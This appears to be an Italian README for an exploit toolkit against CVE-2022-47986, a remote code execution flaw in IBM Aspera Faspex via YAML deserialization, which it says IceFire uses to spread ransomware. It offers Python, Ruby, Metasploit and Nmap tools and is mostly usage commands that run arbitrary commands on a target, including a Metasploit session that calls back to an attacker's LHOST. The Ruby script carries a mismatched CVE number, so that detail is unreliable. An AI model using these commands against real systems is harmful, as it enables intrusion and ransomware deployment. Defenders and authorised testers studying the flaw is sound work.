
CVE-2022-47986: moduli Python, Ruby, NMAP e Metasploit per sfruttare la vulnerabilità.
Questa vulnerabilità viene sfruttata in the wild. IceFire usa questa vulnerabilità per distribuire il ransomware sui sistemi presi di mira; vorrei aiutare i team SOC/Blue a identificare i sistemi interessati e i Pentester/Red team a sfruttarla e segnalarla.
Propongo script puri in Python e Ruby, moduli per Metasploit e Nmap per sfruttare la vulnerabilità che causa una RCE (Esecuzione Remota di Codice) su IBM Aspera Faspex tramite deserializzazione YAML.
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
Licenziato sotto la GPL, versione 3.